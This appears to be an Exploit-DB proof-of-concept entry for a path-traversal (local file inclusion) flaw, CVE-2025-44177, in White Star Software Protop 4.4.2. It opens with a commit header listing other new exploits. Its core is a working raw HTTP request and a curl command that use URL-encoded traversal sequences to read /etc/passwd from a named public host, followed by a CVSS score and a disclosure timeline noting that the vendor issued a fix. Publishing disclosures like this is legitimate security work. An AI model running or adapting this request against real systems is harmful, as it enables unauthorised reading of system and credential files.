08e51ef2f9
12 changes to exploits/shellcodes/ghdb TOTOLINK N300RB 8.54 - Command Execution MikroTik RouterOS 7.19.1 - Reflected XSS Langflow 1.2.x - Remote Code Execution (RCE) PivotX 3.0.0 RC3 - Remote Code Execution (RCE) SugarCRM 14.0.0 - SSRF/Code Injection White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI) WP Publications WordPress Plugin 1.2 - Stored XSS NodeJS 24.x - Path Traversal Keras 2.15 - Remote Code Execution (RCE) Microsoft Brokering File System Windows 11 Version 22H2 - Elevation of Privilege Microsoft Graphics Component Windows 11 Pro (Build 26100+) - Local Elevation of Privileges Microsoft Outlook - Remote Code Execution (RCE)
34 lines
No EOL
1.1 KiB
Text
34 lines
No EOL
1.1 KiB
Text
# Exploit Title: White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)
|
|
# Date: 2025-07-09
|
|
# Exploit Author: Imraan Khan (Lich-Sec)
|
|
# Vendor Homepage: https://wss.com/
|
|
# Software Link: https://client.protop.co.za/
|
|
# Version: v4.4.2-2024-11-27
|
|
# Tested on: Ubuntu 22.04 / Linux
|
|
# CVE: CVE-2025-44177
|
|
# CWE: CWE-22 - Path Traversal
|
|
|
|
# Description:
|
|
# A Local File Inclusion vulnerability exists in White Star Software Protop v4.4.2.
|
|
# An unauthenticated remote attacker can retrieve arbitrary files via
|
|
# URL-encoded traversal sequences in the `/pt3upd/` endpoint.
|
|
|
|
# Vulnerable Endpoint:
|
|
GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
|
|
Host: client.protop.co.za
|
|
User-Agent: curl/8.0
|
|
Accept: */*
|
|
|
|
# Example curl command:
|
|
curl -i 'https://client.protop.co.za/pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd'
|
|
|
|
# Notes:
|
|
# - Vulnerability confirmed on public instance at time of testing.
|
|
# - CVSS v3.1 Base Score: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N)
|
|
# - The vendor was notified and a fix was issued.
|
|
|
|
# Disclosure Timeline:
|
|
# - Discovered: 2025-03-13
|
|
# - Disclosed to vendor: 2025-03-20
|
|
# - CVE Assigned: 2025-07-01
|
|
# - Public Disclosure: 2025-07-09 |